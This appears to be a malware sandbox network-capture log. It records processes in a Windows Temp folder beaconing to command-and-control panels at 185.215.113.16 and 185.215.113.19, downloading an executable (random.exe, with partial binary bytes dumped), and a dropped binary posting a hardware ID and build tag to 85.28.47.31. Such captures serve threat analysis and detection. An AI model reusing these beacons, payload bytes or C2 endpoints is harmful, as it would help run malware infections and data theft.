Jul 26, 2024 20:10:05.346010923 CEST	1236	IN	Data Raw: 45 10 85 c0 74 06 c7 00 0c 00 00 00 33 c0 eb 0d 8b 4d 10 85 c9 74 06 c7 01 0c 00 00 00 5e 5d c3 8b ff 55 8b ec 83 ec 1c 56 ff 75 08 8d 4d e4 e8 92 e8 ff ff 8b 45 10 8b 75 0c 85 c0 74 02 89 30 85 f6 75 24 e8 33 f7 ff ff c7 00 16 00 00 00 e8 d6 f6 Data Ascii: Et3Mt^]UVuMEut0u$3}tE`p3}t}\|}$eMSW~~EPjP=MBtG-uM+uGEOF$=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49727	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:04.677944899 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:05.459384918 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:05.460453987 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:05.713053942 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49728	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:05.838783979 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:06.969311953 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:06.970628023 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:06.971507072 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:07.219696045 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49729	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:06.988603115 CEST	182	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Jul 26, 2024 20:10:07.729320049 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49730	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:07.337409019 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:08.114969969 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:08.115987062 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:08.365966082 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49731	185.215.113.16	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:07.861917019 CEST	55	OUT	GET /cost/random.exe HTTP/1.1 Host: 185.215.113.16
Jul 26, 2024 20:10:08.647648096 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:08 GMT Content-Type: application/octet-stream Content-Length: 91648 Last-Modified: Fri, 26 Jul 2024 17:31:31 GMT Connection: keep-alive ETag: "66a3dd73-16600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 62 05 40 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 0c 01 00 00 56 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 71 01 00 c8 00 00 00 00 90 01 00 9c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELb@]2V0@\|qpt,.code78 `.textP< `.rdata304@@.data,pD@.rsrcV@@
Jul 26, 2024 20:10:08.647700071 CEST	164	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 ac 00 00 00 68 00 00 00 00 68 10 80 41 00 e8 5c 40 00 00 83 c4 0c 68 00 00 00 00 Data Ascii: hhhA\@hU@AhhhB@A?pA4AICZ
Jul 26, 2024 20:10:08.647803068 CEST	1236	IN	Data Raw: 85 00 00 e8 78 7d 00 00 e8 40 43 00 00 e8 c3 b6 00 00 e8 6b a1 00 00 ba 2e 70 41 00 8d 0d 1c 80 41 00 e8 d3 3f 00 00 68 f5 ff ff ff e8 e3 3f 00 00 a3 3c 80 41 00 b8 00 02 00 00 50 8d 05 b8 80 41 00 50 31 c0 50 68 15 00 00 00 68 04 00 00 00 e8 1d Data Ascii: x}@Ck.pAA?h?<APAP1Phh5AhhxpAAPh_5AhhppAAPh9hAhpAhhh:pAlA+?5AhhppAAPh
Jul 26, 2024 20:10:08.648235083 CEST	1236	IN	Data Raw: 00 eb 02 31 c0 21 c0 0f 84 06 01 00 00 b8 26 70 41 00 50 ff 35 90 80 41 00 e8 00 42 00 00 89 04 24 c7 44 24 04 01 00 00 00 eb 00 8b 04 24 3b 44 24 04 0f 8c 92 00 00 00 52 e8 00 c9 00 00 5a 50 52 e8 f8 c8 00 00 5a 50 b8 66 70 41 00 50 ff 74 24 10 Data Ascii: 1!&pAP5AB$D$$;D$RZPRZPfpAPt$5AQBD$Pt$!tLRZPt$3D$PT$RZPR=T$R3fpAR(D$PD$at$@D$hD$Pt$4Pt$ 5<
Jul 26, 2024 20:10:08.648269892 CEST	1236	IN	Data Raw: 00 ff 74 24 10 68 00 00 00 00 b8 24 70 41 00 50 ff 74 24 20 e8 6b 36 00 00 52 e8 4b c4 00 00 5a 50 52 e8 43 c4 00 00 5a 50 ff 74 24 18 e8 78 81 00 00 8d 05 78 80 41 00 50 e8 6c c4 00 00 ff 35 78 80 41 00 e8 88 8d 00 00 ff 35 78 80 41 00 e8 5b 8c Data Ascii: t$h$pAPt$ k6RKZPRCZPt$xxAPl5xA5xA[t$h$pAP5xA6RZPRZPt$#,AP5,A35,At$h$pAP5,A55,Aw8RZPRZPt$@AP
Jul 26, 2024 20:10:08.649070024 CEST	1236	IN	Data Raw: 50 52 e8 2f c1 00 00 8d 44 24 08 50 e8 c5 bf 00 00 8b 54 24 04 52 e8 7b bf 00 00 5a 50 52 e8 13 c1 00 00 58 50 e8 5c 32 00 00 5a 01 d0 eb 0a e8 92 c1 00 00 66 c7 00 00 00 ff 34 24 e8 25 c0 00 00 ff 74 24 04 e8 1c c0 00 00 83 c4 08 5b c2 04 00 31 Data Ascii: PR/D$PT$R{ZPRXP\2Zf4$%t$[1P}R7ZPhT$R&ZPRRZPRZP{X$pAP1T$n214$S1P$u5A4!t5Ab45pA
Jul 26, 2024 20:10:08.649104118 CEST	1236	IN	Data Raw: 52 e8 bc ba 00 00 5a 50 52 e8 54 bc 00 00 58 50 e8 9d 2d 00 00 5a 01 d0 eb 0a e8 d3 bc 00 00 66 c7 00 00 00 ff 74 24 04 e8 65 bb 00 00 ff 74 24 08 e8 5c bb 00 00 ff 34 24 e8 54 bb 00 00 ff 74 24 0c e8 4b bb 00 00 83 c4 10 5b c2 04 00 53 31 c0 50 Data Ascii: RZPRTXP-Zft$et$\4$Tt$K[S1PPPPT$$A,T$L$4,ht$hqD$\|$tt$t$)D$t$lt$s9!uD$D$14$t$[1PPPT$$+h
Jul 26, 2024 20:10:08.649899960 CEST	820	IN	Data Raw: 08 ff 74 24 08 ff 74 24 3c ff 74 24 44 e8 5b 1e 00 00 8b 1d 84 80 41 00 83 fb 01 75 1b 8b 5c 24 20 8b 2d 98 80 41 00 6b db 0c 01 dd ff 75 00 ff 74 24 3c e8 7b 7e 00 00 e9 ae 01 00 00 83 7c 24 30 00 0f 84 24 01 00 00 ff 74 24 30 ff 35 54 80 41 00 Data Ascii: t$t$<t$D[Au\$ -Akut$<{~\|$0$t$05TAD$4t$4RPD$D$5HAD$Pt$<t$4sRPD$D$\$4SksRPD$D$D$PWrD$<PAR'ZPRlAR\$$-AkUR
Jul 26, 2024 20:10:08.649934053 CEST	1236	IN	Data Raw: 00 83 ec 04 c7 04 24 00 00 00 00 4a 75 f3 e8 e7 b3 00 00 8d 04 24 50 e8 00 25 00 00 8d 2c 24 66 83 7d 00 00 74 07 b8 01 00 00 00 eb 02 31 c0 83 c4 24 5d c3 31 c0 50 50 50 e8 bc b3 00 00 ff 74 24 14 e8 93 25 00 00 8b 54 24 10 8d 0c 24 e8 47 24 00 Data Ascii: $Ju$P%,$f}t1$]1PPPt$%T$$G$h'}oD$h't$t$$RAZPR9ZPht$oD$P_t$oT$RZPRXP$Z#f4$t$S1PPPPPPT
Jul 26, 2024 20:10:08.650679111 CEST	1236	IN	Data Raw: ff 34 24 e8 fb fd ff ff 89 44 24 04 52 e8 d4 ad 00 00 5a 50 ff 74 24 08 e8 ed f0 ff ff e8 e4 20 00 00 52 e8 be ad 00 00 5a 50 52 e8 b6 ad 00 00 5a 50 b8 24 70 41 00 50 ff 35 28 80 41 00 e8 78 62 00 00 8d 44 24 0c 50 e8 d9 ad 00 00 8b 54 24 08 31 Data Ascii: 4$D$RZPt$ RZPRZP$pAP5(AxbD$PT$1. FRZPRzZPRrZPRjZPh5HAU ${-D$PR;ZPR3ZPR+ZPR#ZPh5HA $4-D$P:RZ
Jul 26, 2024 20:10:08.652754068 CEST	1236	IN	Data Raw: 8b 2d a4 80 41 00 ff 75 0c e8 36 1b 00 00 eb e1 b8 01 00 00 00 eb 02 31 c0 83 c4 04 5b 5d c3 53 31 c0 50 50 e8 29 aa 00 00 ff 74 24 18 e8 00 1c 00 00 8b 54 24 14 8d 0c 24 e8 b4 1a 00 00 ff 74 24 10 31 db 3b 1c 24 75 24 52 e8 c3 a8 00 00 5a 50 52 Data Ascii: -Au61[]S1PP)t$T$$t$1;$u$RZPRZP)rD$P9;$u#xARZPR'D$P;$u)RhZPR`ZPhrD$P;$u)R5ZPR-ZPhqD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49732	85.28.47.31	80	7496	C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:08.022555113 CEST	86	OUT	GET / HTTP/1.1 Host: 85.28.47.31 Connection: Keep-Alive Cache-Control: no-cache
Jul 26, 2024 20:10:08.664995909 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 20:10:08.667670012 CEST	409	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKF Host: 85.28.47.31 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 37 34 41 30 33 30 46 43 42 46 31 30 37 39 32 30 39 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 2d 2d 0d 0a Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="hwid"0374A030FCBF1079209047------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="build"sila------HCFIJKKKKKFCAAAAFBKF--
Jul 26, 2024 20:10:08.878654957 CEST	210	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49733	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:08.475670099 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:09.225220919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:09.231975079 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:09.479749918 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49734	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:09.618196964 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:10.378010988 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:10.380075932 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:10.638221979 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49736	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:09.777546883 CEST	182	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 33 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000003002&unit=246122658369
Jul 26, 2024 20:10:10.575046062 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49737	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:11.154890060 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:11.666721106 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:11.691343069 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:11.940299988 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49738	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:11.176441908 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:11.730504990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
